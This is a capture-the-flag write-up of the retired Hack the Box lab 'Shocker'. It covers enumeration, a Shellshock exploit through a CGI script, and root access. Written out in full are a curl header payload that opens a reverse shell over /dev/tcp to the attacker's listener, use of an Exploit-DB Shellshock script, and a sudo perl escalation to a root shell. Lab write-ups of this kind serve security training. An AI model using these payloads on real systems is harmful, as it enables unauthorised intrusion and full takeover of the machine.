HTB – Shocker

Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retried Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let’s  start with a basic nmap scan

c:\Users\jacco>nmap -sC -sV 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin, index.html, server-status

root@kali:~/htb/shocker# dirb http://10.10.10.56
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:56:05 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) 
+ http://10.10.10.56/index.html (CODE:200|SIZE:137) 
+ http://10.10.10.56/server-status (CODE:403|SIZE:299) 
-----------------
END_TIME: Tue May 28 12:58:24 2019
DOWNLOADED: 4612 - FOUND: 3

root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 13:02:27 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118) 
-----------------
END_TIME: Tue May 28 13:04:47 2019
DOWNLOADED: 4612 - FOUND: 1
root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00

Let’s run the Shellshock command against this file and see if we can pull a reverse shell. I looked across the internet to find the string that causes the Shellshock bug and whipped something together.

The command I used looked like this:

root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
That invoked Shellshock, called a reverse shell to my netcat listener, and designated that it run against the file we found.
root@kali:~/htb/shocker# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:39634.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

we can also do a manual exploitation with python script from https://www.exploit-db.com/exploits/34900
root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> ls 
user.sh

10.10.10.56> cd /home
10.10.10.56> ls
shelly

10.10.10.56> cd shelly
10.10.10.56> cat user.txt
2ec*****233

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> cat /root/root.txt
52c*****a467

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *